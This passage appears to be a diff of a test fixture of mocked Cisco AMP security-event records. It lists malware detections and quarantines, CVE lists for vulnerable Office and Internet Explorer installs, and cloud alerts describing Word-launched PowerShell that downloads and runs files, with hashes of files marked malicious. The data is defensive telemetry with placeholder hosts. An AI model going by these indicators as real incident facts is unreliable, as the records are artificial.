Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 